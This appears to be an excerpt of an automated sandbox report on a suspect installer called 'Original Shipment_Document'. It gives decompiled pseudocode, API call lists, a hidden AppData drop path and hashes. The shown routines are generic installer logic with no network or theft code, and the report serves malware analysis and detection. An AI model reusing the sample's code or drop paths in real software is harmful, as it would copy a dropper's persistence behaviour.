                                                  • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                  • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                  • Part of subcall function 0040678E: CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                                                  • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                  • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                                                  • Part of subcall function 00404D10: SetDlgItemTextW.USER32 ref: 00404DCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen$Call
                                                • API String ID: 2624150263-4191632158
                                                • Opcode ID: 1c5a3ed0ee9c710774ec2d8b2a9b1df20d62e7de402cc8ac4ccff064f1b89d12
                                                • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                                                • Opcode Fuzzy Hash: 1c5a3ed0ee9c710774ec2d8b2a9b1df20d62e7de402cc8ac4ccff064f1b89d12
                                                • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 67%
                                                			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E4D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                0x004021b3
                                                0x004021bd
                                                0x004021c7
                                                0x004021d1
                                                0x004021dc
                                                0x004021df
                                                0x004021f9
                                                0x004021fc
                                                0x00402202
                                                0x00402205
                                                0x0040220f
                                                0x00402213
                                                0x00402213
                                                0x00402218
                                                0x00402229
                                                0x00402231
                                                0x004022e8
                                                0x004022e8
                                                0x004022ef
                                                0x00402237
                                                0x00402237
                                                0x00402246
                                                0x0040224a
                                                0x0040224d
                                                0x00402253
                                                0x00402261
                                                0x00402264
                                                0x00402266
                                                0x00402271
                                                0x00402271
                                                0x00402276
                                                0x00402278
                                                0x0040227f
                                                0x0040227f
                                                0x00402282
                                                0x0040228b
                                                0x0040228e
                                                0x00402294
                                                0x00402296
                                                0x004022a0
                                                0x004022a0
                                                0x004022a3
                                                0x004022ac
                                                0x004022af
                                                0x004022b8
                                                0x004022be
                                                0x004022c0
                                                0x004022ce
                                                0x004022ce
                                                0x004022d1
                                                0x004022d7
                                                0x004022d7
                                                0x004022da
                                                0x004022e0
                                                0x004022e6
                                                0x004022fb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004022e6
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen, xrefs: 00402269
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen
                                                • API String ID: 542301482-3455914134
                                                • Opcode ID: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
                                                • Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
                                                • Opcode Fuzzy Hash: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
                                                • Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 39%
                                                			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E0040644E( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406507();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                0x00402923
                                                0x0040293e
                                                0x00402949
                                                0x0040294a
                                                0x00402a94
                                                0x00402925
                                                0x00402928
                                                0x0040292b
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
                                                • Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
                                                • Opcode Fuzzy Hash: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
                                                • Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E00404ED0(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a248;
				_v28 =  *0x42a230 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a239 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E1E(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a238) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x4236ec;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423700;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x4236ec = 0;
								 *0x423700 = 0;
								 *0x42a280 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a239 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404E9E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423700;
									_t201 =  *0x42a248;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a24c <= 0) {
										L86:
										if( *0x42a2de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x4291fc + 0x10)) != 0) {
											E00404DD9(0x3ff, 0xfffffffb, E00404DF1(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a24c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423700);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a280 = _t291;
					 *0x423700 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t258 = LoadImageW( *0x42a220, 0x6e, 0, 0, 0, 0);
					 *0x4236f4 =  *0x4236f4 | 0xffffffff;
					_t297 = _t258;
					 *0x4236fc = SetWindowLongW(_v8, 0xfffffffc, E004054DD);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236ec = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236ec);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406544(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404463(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404463(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423700 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423700 + _t300 * 4) = _t284;
									_v16 =  *( *0x423700 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a24c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404498(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404498(_v12);
								L93:
								return E004044CA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                0x00404ed7
                                                0x00404ef0
                                                0x00404ef5
                                                0x00404efd
                                                0x00404f03
                                                0x00404f19
                                                0x00404f1c
                                                0x00405147
                                                0x0040514e
                                                0x00405162
                                                0x00405150
                                                0x00405152
                                                0x00405155
                                                0x00405156
                                                0x0040515d
                                                0x0040515d
                                                0x0040516e
                                                0x0040517c
                                                0x0040517f
                                                0x00405195
                                                0x0040520a
                                                0x0040520d
                                                0x0040520f
                                                0x00405219
                                                0x00405227
                                                0x00405227
                                                0x00405229
                                                0x00405233
                                                0x00405239
                                                0x0040523c
                                                0x0040523f
                                                0x0040525a
                                                0x00405241
                                                0x0040524b
                                                0x0040524b
                                                0x0040523f
                                                0x00405233
                                                0x00000000
                                                0x0040520d
                                                0x0040519a
                                                0x004051a5
                                                0x004051aa
                                                0x004051b1
                                                0x004051b6
                                                0x004051ba
                                                0x004051c5
                                                0x004051c5
                                                0x004051c9
                                                0x004051cd
                                                0x004051d1
                                                0x004051e4
                                                0x004051d3
                                                0x004051d3
                                                0x004051da
                                                0x004051e0
                                                0x004051dc
                                                0x004051dc
                                                0x004051dc
                                                0x004051da
                                                0x004051e8
                                                0x004051ea
                                                0x004051fd
                                                0x00405200
                                                0x00405203
                                                0x00405203
                                                0x004051cd
                                                0x00000000
                                                0x004051ba
                                                0x0040519c
                                                0x004051a3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040525d
                                                0x0040525d
                                                0x00405264
                                                0x004052d5
                                                0x004052dd
                                                0x004052e5
                                                0x004052e5
                                                0x004052ee
                                                0x004052f0
                                                0x004052f7
                                                0x004052fa
                                                0x004052fa
                                                0x00405300
                                                0x00405307
                                                0x0040530a
                                                0x0040530a
                                                0x00405310
                                                0x00405316
                                                0x0040531c
                                                0x0040531c
                                                0x00405329
                                                0x0040548a
                                                0x00405491
                                                0x004054ae
                                                0x004054b4
                                                0x004054c6
                                                0x004054c6
                                                0x00000000
                                                0x0040532f
                                                0x00405331
                                                0x00405336
                                                0x0040533b
                                                0x00405340
                                                0x00405342
                                                0x00405342
                                                0x00405343
                                                0x00405344
                                                0x00405346
                                                0x00405346
                                                0x0040534e
                                                0x0040538f
                                                0x00405391
                                                0x004053a1
                                                0x004053a4
                                                0x004053a9
                                                0x004053b0
                                                0x004053b3
                                                0x00405455
                                                0x0040545e
                                                0x00405466
                                                0x00405466
                                                0x00405474
                                                0x00405485
                                                0x00405485
                                                0x00000000
                                                0x00405474
                                                0x004053b9
                                                0x004053bc
                                                0x004053c2
                                                0x004053c7
                                                0x004053c9
                                                0x004053cb
                                                0x004053d1
                                                0x004053d8
                                                0x004053dd
                                                0x004053e4
                                                0x004053e7
                                                0x004053e7
                                                0x004053ee
                                                0x004053fa
                                                0x004053fe
                                                0x00405400
                                                0x00405400
                                                0x004053f0
                                                0x004053f2
                                                0x004053f2
                                                0x00405420
                                                0x0040542c
                                                0x0040543b
                                                0x0040543b
                                                0x0040543d
                                                0x00405440
                                                0x00405449
                                                0x00000000
                                                0x00405350
                                                0x0040535b
                                                0x0040535e
                                                0x00405363
                                                0x00405365
                                                0x00405369
                                                0x00405379
                                                0x00405383
                                                0x00405385
                                                0x00405388
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040536b
                                                0x0040536b
                                                0x00405371
                                                0x00405373
                                                0x00405373
                                                0x00405374
                                                0x00405375
                                                0x00000000
                                                0x0040536b
                                                0x0040534e
                                                0x00405329
                                                0x0040526c
                                                0x00000000
                                                0x00405282
                                                0x0040528c
                                                0x00405291
                                                0x00000000
                                                0x00000000
                                                0x004052a3
                                                0x004052a8
                                                0x004052b4
                                                0x004052b4
                                                0x004052b6
                                                0x004052c5
                                                0x004052c7
                                                0x004052cb
                                                0x004052ce
                                                0x00000000
                                                0x004052ce
                                                0x0040526c
                                                0x00404f22
                                                0x00404f27
                                                0x00404f30
                                                0x00404f37
                                                0x00404f49
                                                0x00404f54
                                                0x00404f5a
                                                0x00404f68
                                                0x00404f7c
                                                0x00404f81
                                                0x00404f8e
                                                0x00404f93
                                                0x00404fa9
                                                0x00404fba
                                                0x00404fc7
                                                0x00404fc7
                                                0x00404fca
                                                0x00404fd0
                                                0x00404fd2
                                                0x00404fd5
                                                0x00404fda
                                                0x00404fdf
                                                0x00404fe1
                                                0x00404fe1
                                                0x00405001
                                                0x00405001
                                                0x00405003
                                                0x00405004
                                                0x00405009
                                                0x0040500f
                                                0x00405013
                                                0x00405018
                                                0x00405020
                                                0x00405024
                                                0x00405029
                                                0x0040502e
                                                0x00405036
                                                0x00405039
                                                0x00405109
                                                0x0040511c
                                                0x00000000
                                                0x0040503f
                                                0x00405042
                                                0x00405045
                                                0x00405048
                                                0x00405048
                                                0x0040504e
                                                0x00405057
                                                0x0040505a
                                                0x0040505e
                                                0x00405061
                                                0x00405064
                                                0x0040506d
                                                0x00405076
                                                0x00405079
                                                0x0040507c
                                                0x0040507f
                                                0x004050bd
                                                0x004050e8
                                                0x004050bf
                                                0x004050ce
                                                0x004050ce
                                                0x00405081
                                                0x00405084
                                                0x00405092
                                                0x0040509c
                                                0x004050a4
                                                0x004050ab
                                                0x004050b6
                                                0x004050b6
                                                0x0040507f
                                                0x004050ee
                                                0x004050ef
                                                0x004050fb
                                                0x004050fb
                                                0x00405107
                                                0x00405122
                                                0x00405125
                                                0x00405142
                                                0x00000000
                                                0x00405127
                                                0x0040512c
                                                0x00405135
                                                0x004054c8
                                                0x004054da
                                                0x004054da
                                                0x00405125
                                                0x00000000
                                                0x00405107
                                                0x00405039

                                                APIs
                                                • GetDlgItem.USER32 ref: 00404EE8
                                                • GetDlgItem.USER32 ref: 00404EF3
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                                                • LoadImageW.USER32 ref: 00404F54
                                                • SetWindowLongW.USER32 ref: 00404F6D
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                                                • DeleteObject.GDI32(00000000), ref: 00404FCA
